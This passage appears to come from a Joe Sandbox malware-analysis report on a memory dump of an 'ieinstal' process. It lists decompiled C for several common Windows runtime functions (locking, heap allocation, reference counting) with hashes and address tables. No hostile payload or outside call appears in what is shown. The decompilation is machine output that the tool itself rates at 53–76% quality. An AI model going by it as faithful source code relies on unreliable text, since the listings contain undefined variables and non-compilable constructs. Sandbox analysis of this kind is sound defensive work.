                        0x1ed81400
                        0x1ed81400
                        0x1ed48f08
                        0x1ed48f32

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6dc59bdf9de2f2845536a7e6e78f9441f945ec60beb2e7f960b0815c8c15e71
                        • Instruction ID: 11a1f69cc1a1e1da62949d540b3a28c2e65b8f8451d8407ef491f941988ca965
                        • Opcode Fuzzy Hash: d6dc59bdf9de2f2845536a7e6e78f9441f945ec60beb2e7f960b0815c8c15e71
                        • Instruction Fuzzy Hash: 3741A3B5D00258DFDB10CFAAD981AADFBF5BB48710F5042AEE509A7640DB709A45CF60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED44A2C, Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E1ED44A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x1edfd360 ^ _t62;
				_v8 =  *0x1edfd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E1ED22280(_t26, 0x1edf8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E1ED1FFB0(_t41, _t51, 0x1edf8608);
						L2:
						 *0x1edfb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E1ED4B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E1ED22280(_t28, 0x1edf8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E1ED1FFB0(_t42, _t53, 0x1edf8608);
							if(_t53 != 0) {
								L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E1ED1FFB0(_t41, _t51, 0x1edf8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                        0x1ed44a2c
                        0x1ed44a34
                        0x1ed44a3c
                        0x1ed44a3e
                        0x1ed44a48
                        0x1ed44a4b
                        0x1ed44a4d
                        0x1ed44a51
                        0x1ed44a9c
                        0x00000000
                        0x00000000
                        0x1ed44aa3
                        0x1ed44aa8
                        0x1ed44aad
                        0x1ed44ab1
                        0x1ed44ade
                        0x1ed44ae3
                        0x1ed44a5a
                        0x1ed44a62
                        0x1ed44a6a
                        0x1ed44a6e
                        0x1ed7f203
                        0x1ed44a84
                        0x1ed44a88
                        0x1ed44a89
                        0x1ed44a8a
                        0x1ed44a95
                        0x1ed44a95
                        0x1ed44a79
                        0x1ed44a80
                        0x1ed44af2
                        0x1ed44af4
                        0x1ed44af9
                        0x1ed44aff
                        0x1ed44b01
                        0x1ed44b03
                        0x1ed44b08
                        0x1ed7f20a
                        0x1ed7f212
                        0x1ed7f216
                        0x1ed7f216
                        0x1ed44b08
                        0x1ed44b13
                        0x1ed44b1a
                        0x1ed7f229
                        0x1ed7f229
                        0x1ed44b1a
                        0x1ed44a82
                        0x00000000
                        0x1ed44a82
                        0x1ed44ab7
                        0x1ed44acd
                        0x1ed44acd
                        0x1ed44ad5
                        0x1ed44ada
                        0x00000000
                        0x1ed44ada
                        0x1ed44ac2
                        0x1ed44acb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed44acb
                        0x1ed44a53
                        0x1ed44a53
                        0x1ed44a58
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c9603e655cdf69c2599e11a0d58101dbdb7e5324be1f512f952cb514e078cc4
                        • Instruction ID: bb563c837e348503f1195eb827e53494108eeb2af731b24b6f7d0cdda52458be
                        • Opcode Fuzzy Hash: 9c9603e655cdf69c2599e11a0d58101dbdb7e5324be1f512f952cb514e078cc4
                        • Instruction Fuzzy Hash: 343138366056E1DBC321CF14CD41B1AF7E6FF91718F610B69E4954BA80C770E885CB96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3E730, Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E1ED3E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E1ED49670() < 0) {
					L1ED5DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1edf7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L1ED24620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M1ED3E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                        0x1ed3e730
                        0x1ed3e736
                        0x1ed3e738
                        0x1ed3e73d
                        0x1ed3e73e
                        0x1ed3e740
                        0x1ed3e749
                        0x1ed3e765
                        0x1ed3e76a
                        0x1ed3e76b
                        0x1ed3e76c
                        0x1ed3e76d
                        0x1ed3e76e
                        0x1ed3e76f
                        0x1ed3e775
                        0x1ed3e777
                        0x1ed3e77e
                        0x1ed7b675
                        0x1ed3e784
                        0x1ed3e784
                        0x1ed3e789
                        0x1ed3e7a8
                        0x1ed3e7ac
                        0x1ed3e807
                        0x1ed3e7ae
                        0x1ed3e7ae
                        0x1ed3e7b1
                        0x1ed3e7b4
                        0x1ed3e7b9
                        0x1ed3e7c0
                        0x1ed3e7c4
                        0x1ed3e7ca
                        0x1ed3e7cc
                        0x00000000
                        0x1ed3e7d3
                        0x1ed3e7d6
                        0x00000000
                        0x00000000
                        0x1ed3e7ff
                        0x1ed3e802
                        0x00000000
                        0x00000000
                        0x1ed3e7f9
                        0x1ed3e7fc
                        0x00000000
                        0x00000000
                        0x1ed3e7f3
                        0x1ed3e7f6
                        0x00000000
                        0x00000000
                        0x1ed3e7ed
                        0x1ed3e7f0
                        0x00000000
                        0x00000000
                        0x1ed3e7e7
                        0x1ed3e7ea
                        0x00000000
                        0x00000000
                        0x1ed7b685
                        0x1ed7b688
                        0x00000000
                        0x00000000
                        0x1ed7b682
                        0x00000000
                        0x00000000
                        0x1ed3e7cc
                        0x1ed3e7d9
                        0x1ed3e7dc
                        0x1ed3e7de
                        0x1ed3e7de
                        0x1ed3e7ac
                        0x1ed3e7e4
                        0x1ed3e74b
                        0x1ed3e751
                        0x1ed3e759
                        0x1ed3e761
                        0x1ed3e761

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e32a8ea0f651c334809564aabeea730a5548d5669d8eb638575743ce58474c56
                        • Instruction ID: 06f4ccad8b3edf1d758a85fc687088be2df57735b7480b108ce7e04e1022c04f
                        • Opcode Fuzzy Hash: e32a8ea0f651c334809564aabeea730a5548d5669d8eb638575743ce58474c56
                        • Instruction Fuzzy Hash: D2315CB5A14249AFD744CF59C841B8AB7E4FB49214F148666FD04CB381D631E980CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3BC2C, Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E1ED3BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1edf6100; // 0x69
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E1ED22280(0xd, 0x9a5cf1a0);
				_t41 =  *0x1edf60f8; // 0x0
				if(_t41 != 0) {
					 *0x1edf60f8 =  *_t41;
					 *0x1edf60fc =  *0x1edf60fc + 0xffff;
				}
				E1ED1FFB0(_t41, 0x800, 0x9a5cf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x1edf60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L1ED24620(0x1edf6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1edf6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                        0x1ed3bc36
                        0x1ed3bc42
                        0x1ed3bc45
                        0x1ed3bc4a
                        0x1ed3bd35
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed3bc50
                        0x1ed3bc50
                        0x1ed3bc58
                        0x1ed3bc5a
                        0x1ed3bc60
                        0x00000000
                        0x00000000
                        0x1ed7a4f2
                        0x1ed7a4f6
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed7a4fc
                        0x1ed3bc79
                        0x1ed3bc7e
                        0x1ed3bc86
                        0x1ed3bd16
                        0x1ed3bd20
                        0x1ed3bd20
                        0x1ed3bc8d
                        0x1ed3bc94
                        0x1ed3bcbd
                        0x1ed3bcca
                        0x1ed3bccb
                        0x1ed3bccc
                        0x1ed3bccd
                        0x1ed3bcce
                        0x1ed3bcd4
                        0x1ed3bcea
                        0x1ed3bcee
                        0x1ed3bcf2
                        0x1ed3bd00
                        0x1ed3bd04
                        0x00000000
                        0x1ed3bc96
                        0x1ed3bcab
                        0x1ed3bcaf
                        0x1ed3bd2c
                        0x1ed3bd2c
                        0x1ed3bd09
                        0x00000000
                        0x1ed3bd09
                        0x1ed3bcb1
                        0x1ed3bcb5
                        0x1ed3bcbb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed3bcbb

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 772111723f77b5ad5bf5894557cea906d800d12758fd282e3ddddd7906c5026b
                        • Instruction ID: 030503c4d7de3458a07d8c009e8b3e83e0ddb067afd9075b852b41b214821dd7
                        • Opcode Fuzzy Hash: 772111723f77b5ad5bf5894557cea906d800d12758fd282e3ddddd7906c5026b
                        • Instruction Fuzzy Hash: 6A3131B6A00696DBCB01DF68D4C079A33B0EF08312F250278EC9ADB245EB71DD068BD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED31DB5, Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E1ED31DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E1ED2F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L1ED24620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E1ED2F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                        0x1ed31dc2
                        0x1ed31dc5
                        0x1ed31dc7
                        0x1ed31dcc
                        0x1ed31dce
                        0x1ed31dd6
                        0x1ed31ddf
                        0x1ed31de0
                        0x1ed31de1
                        0x1ed31de5
                        0x1ed31de8
                        0x1ed31def
                        0x1ed31df0
                        0x1ed31df6
                        0x1ed31df7
                        0x1ed31dfe
                        0x1ed31e1a
                        0x00000000
                        0x00000000
                        0x1ed31e0b
                        0x1ed31e12
                        0x1ed31e12
                        0x1ed31e00
                        0x1ed31e00
                        0x1ed31e05
                        0x1ed31e1e
                        0x1ed31e23
                        0x1ed7570f
                        0x1ed75713
                        0x00000000
                        0x00000000
                        0x1ed75719
                        0x1ed75719
                        0x1ed31e2c
                        0x1ed31e2d
                        0x1ed31e2e
                        0x1ed31e2f
                        0x1ed31e31
                        0x1ed31e32
                        0x1ed31e35
                        0x1ed31e3d
                        0x1ed75723
                        0x1ed7573d
                        0x1ed7573d
                        0x00000000
                        0x1ed75723
                        0x1ed31e49
                        0x1ed31e4e
                        0x1ed31e4e
                        0x1ed31e09
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction ID: 18929da7094bc8ef9c9fd8baae4cda17661afdedf268a53b755765811462f3bd
                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction Fuzzy Hash: 1321B2B5A0015AEFC710CF6ACC80E9FBBBDEF85645F614666E901A7250D731EE01CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED09100, Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E1ED09100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x1eddf6e8);
				E1ED5D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E1EDD88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E1ED5D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x1edf86c0; // 0x2fb07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x1edf86b8; // 0x300f308
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E1ED22280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E1EDD88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E1ED4AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x1edfb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x1edf84c0;
										if(_t69 >=  *0x1edf84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E1EDD9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E1ED0922A(_t82);
							_t53 = E1ED27D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E1EDD8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x1edf86c0; // 0x2fb07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x1edf86b8; // 0x300f308
									if(__eflags == 0) {
										_t79 = 0x1edf86bc;
										_t72 = 0x1edf86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E1ED09240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x1edf86c4;
									_t72 = 0x1edf86c0;
									L18:
									E1ED39B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                        0x1ed09100
                        0x1ed09100
                        0x1ed09100
                        0x1ed09100
                        0x1ed09102
                        0x1ed09107
                        0x1ed0910c
                        0x1ed09110
                        0x1ed09115
                        0x1ed09136
                        0x1ed09143
                        0x1ed637e4
                        0x1ed637e4
                        0x1ed09149
                        0x1ed0914e
                        0x1ed0914e
                        0x1ed09117
                        0x1ed0911d
                        0x00000000
                        0x00000000
                        0x1ed0911f
                        0x1ed09125
                        0x00000000
                        0x1ed09151
                        0x1ed09158
                        0x1ed0915d
                        0x1ed09161
                        0x1ed09168
                        0x1ed63715
                        0x00000000
                        0x1ed0916e
                        0x1ed0916e
                        0x1ed09175
                        0x1ed09177
                        0x1ed0917e
                        0x1ed0917f
                        0x1ed09182
                        0x1ed09182
                        0x1ed09187
                        0x1ed09187
                        0x1ed0918a
                        0x1ed0918d
                        0x1ed0918f
                        0x1ed09192
                        0x1ed09195
                        0x1ed09198
                        0x1ed09198
                        0x1ed09198
                        0x1ed0919a
                        0x00000000
                        0x00000000
                        0x1ed6371f
                        0x1ed63721
                        0x1ed63727
                        0x1ed6372f
                        0x1ed63733
                        0x1ed63735
                        0x1ed63738
                        0x1ed6373b
                        0x1ed6373d
                        0x1ed63740
                        0x00000000
                        0x00000000
                        0x1ed63746
                        0x1ed63749
                        0x00000000
                        0x00000000
                        0x1ed6374f
                        0x1ed63751
                        0x00000000
                        0x00000000
                        0x1ed63757
                        0x1ed63759
                        0x1ed6375c
                        0x1ed6375c
                        0x1ed6375e
                        0x1ed6375e
                        0x1ed63761
                        0x1ed63764
                        0x00000000
                        0x00000000
                        0x1ed63766
                        0x1ed63768
                        0x1ed637a3
                        0x1ed637a3
                        0x1ed637a5
                        0x1ed637a7
                        0x1ed637ad
                        0x1ed637b0
                        0x1ed637b2
                        0x1ed637bc
                        0x1ed637c2
                        0x1ed637c2
                        0x1ed637b2
                        0x1ed09187
                        0x1ed09187
                        0x1ed0918a
                        0x1ed0918d
                        0x1ed0918f
                        0x1ed09192
                        0x1ed09195
                        0x00000000
                        0x1ed09195
                        0x00000000
                        0x1ed09187
                        0x1ed6376a
                        0x1ed6376a
                        0x1ed6376c
                        0x1ed6376c
                        0x1ed6376f
                        0x1ed63775
                        0x00000000
                        0x00000000
                        0x1ed63777
                        0x1ed63779
                        0x00000000
                        0x00000000
                        0x1ed63782
                        0x1ed63787
                        0x1ed63789
                        0x1ed63790
                        0x1ed63790
                        0x1ed6378b
                        0x1ed6378b
                        0x1ed6378b
                        0x1ed63792
                        0x1ed63795
                        0x1ed63795
                        0x1ed63798
                        0x1ed63798
                        0x1ed6379b
                        0x1ed6379b
                        0x1ed091a3
                        0x1ed091a9
                        0x1ed091b0
                        0x1ed091b4
                        0x1ed091b4
                        0x1ed091bb
                        0x1ed091c0
                        0x1ed091c5
                        0x1ed091c7
                        0x1ed637da
                        0x1ed091cd
                        0x1ed091cd
                        0x1ed091cd
                        0x1ed091d2
                        0x1ed091d5
                        0x1ed09239
                        0x1ed09239
                        0x1ed091d7
                        0x1ed091db
                        0x1ed091e1
                        0x1ed091e7
                        0x1ed091fd
                        0x1ed09203
                        0x1ed0921e
                        0x1ed09223
                        0x00000000
                        0x1ed09223
                        0x1ed09205
                        0x1ed09208
                        0x1ed0920c
                        0x1ed09214
                        0x1ed09214
                        0x1ed091e9
                        0x1ed091e9
                        0x1ed091ee
                        0x1ed091f3
                        0x1ed091f3
                        0x1ed091f3
                        0x1ed091e7
                        0x00000000
                        0x1ed091db
                        0x1ed09187
                        0x1ed09168

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 52503793424954a3b5901ee08278c01a12fc6bf998533aa9f7e4348f355be3ec
                        • Instruction ID: ca276bbdae353511f244c0467475898a57b0508cd0e463fc486e60ac4b2516ab
                        • Opcode Fuzzy Hash: 52503793424954a3b5901ee08278c01a12fc6bf998533aa9f7e4348f355be3ec
                        • Instruction Fuzzy Hash: 3B319E78B05685DFDB11CB69C598B8DBBB2BF89314F5D8759C4096B2C1C330E984CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED20050, Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E1ED20050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
